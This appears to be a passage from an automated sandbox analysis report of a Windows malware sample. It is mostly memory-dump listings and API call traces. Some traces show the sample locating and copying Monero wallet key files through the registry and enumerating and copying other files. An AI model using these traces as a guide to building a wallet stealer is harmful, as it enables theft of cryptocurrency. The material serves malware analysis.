                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: <+
                                                                                                                                                                                                                                                    • API String ID: 2507841554-3718021163
                                                                                                                                                                                                                                                    • Opcode ID: 416a595fae62bde833fd3c2ae0abfb945a0c261d2881029739c5d64c1dc7c759
                                                                                                                                                                                                                                                    • Instruction ID: fbe41f2fe4e8a32b43aa4037ddc5f5bc9e2551a19cfddd8086ecab1442e6bc6b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 416a595fae62bde833fd3c2ae0abfb945a0c261d2881029739c5d64c1dc7c759
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37414FB190112CABDF70AF20ED49BDA7BB8FF04314F1101A6FB49A6152DA319E85CF65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0009B9C5
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0009BA3E
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0009BA5A
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0009BA6E
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0009BA77
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0009BA87
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0009BAA5
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0009BAB5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2979504256-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 0f982006ccfb2fef5e37ab9d172e5199cdacf485ef584d63e3922a1b81126b2c
                                                                                                                                                                                                                                                    • Instruction ID: e50eee7332fce6ae2dc40e6810b4cec22b66da3852e274cee94381e32366c1d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f982006ccfb2fef5e37ab9d172e5199cdacf485ef584d63e3922a1b81126b2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B5101B1D0021CAFEF28DF99E985AAEBBF8EB44310F10442AE511A6260E7749D45DF11
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0008DBBB
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0008DBCD
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0008DBF2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC14
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008DC21
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC28
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DC6F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEF$`Tu
                                                                                                                                                                                                                                                    • API String ID: 453150750-1497512213
                                                                                                                                                                                                                                                    • Opcode ID: 18b5fcea0e37c1be7e5cf26a317d5fab8162565e97fc28719c12e8f24c491c39
                                                                                                                                                                                                                                                    • Instruction ID: faea2c554b5037471055881a8085c48b4c8de5c6ebf91863757975f97670b885
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18b5fcea0e37c1be7e5cf26a317d5fab8162565e97fc28719c12e8f24c491c39
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D314E719002199FDF00EFE8DC49ADEBBB5AF48355F110229E941FB281DB75A905CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00081ADC
                                                                                                                                                                                                                                                      • Part of subcall function 00081A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00081A65
                                                                                                                                                                                                                                                      • Part of subcall function 00081A51: HeapAlloc.KERNEL32(00000000), ref: 00081A6C
                                                                                                                                                                                                                                                      • Part of subcall function 00081A51: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00081AE9), ref: 00081A89
                                                                                                                                                                                                                                                      • Part of subcall function 00081A51: RegQueryValueExA.ADVAPI32(00081AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00081AA4
                                                                                                                                                                                                                                                      • Part of subcall function 00081A51: RegCloseKey.ADVAPI32(00081AE9), ref: 00081AAD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00081AF1
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00081AFE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,.keys), ref: 00081B19
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00081C2A
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00081C9D
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                    • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                    • API String ID: 615783205-3586502688
                                                                                                                                                                                                                                                    • Opcode ID: decdb58e25cd0b8e4ae0e0c8735eb8d4a9033c921c77be16c52c20137f966af1
                                                                                                                                                                                                                                                    • Instruction ID: 8beea851e1b040ca174e387ce832de316c19568f8e2cbf58e2b3039b77bb589e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: decdb58e25cd0b8e4ae0e0c8735eb8d4a9033c921c77be16c52c20137f966af1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B451C771D9012D9BCF11BB64EC46ADD73B8AF04304F4144A1F648B7152DA30AE8A9F95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00095E86
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00095EA3
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095EC2
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095ED6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095EE9
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095EFD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095F10
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00095B30
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: HeapAlloc.KERNEL32(00000000), ref: 00095B37
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: wsprintfA.USER32 ref: 00095B50
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: FindFirstFileA.KERNEL32(?,?), ref: 00095B67
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: StrCmpCA.SHLWAPI(?,000B6A98), ref: 00095B88
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: StrCmpCA.SHLWAPI(?,000B6A9C), ref: 00095BA2
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: wsprintfA.USER32 ref: 00095BC9
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00095C86
                                                                                                                                                                                                                                                      • Part of subcall function 00095B0B: DeleteFileA.KERNEL32(?), ref: 00095CA9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                    • String ID: Lz
                                                                                                                                                                                                                                                    • API String ID: 1546541418-718111854
                                                                                                                                                                                                                                                    • Opcode ID: c2cc0ad8514e45f93b68d690b122edfa36d0b00a9eb0f28c1d455bb168a1ea42
                                                                                                                                                                                                                                                    • Instruction ID: c22f8d4e3d4713a92d8db851136335136faf2c8201d4d82ed58f22ed7020b21c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2cc0ad8514e45f93b68d690b122edfa36d0b00a9eb0f28c1d455bb168a1ea42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6051C7B1E0011C9BCF55DB64DC89ADDB7B9AB4C310F8144E6EA09E3251EA30AF898F54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • UnDecorator::getArgumentList.LIBCMT ref: 0009F969
                                                                                                                                                                                                                                                      • Part of subcall function 0009F504: Replicator::operator[].LIBCMT ref: 0009F587
                                                                                                                                                                                                                                                      • Part of subcall function 0009F504: DName::operator+=.LIBCMT ref: 0009F58F
                                                                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 0009F9C2
                                                                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 0009FA1A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
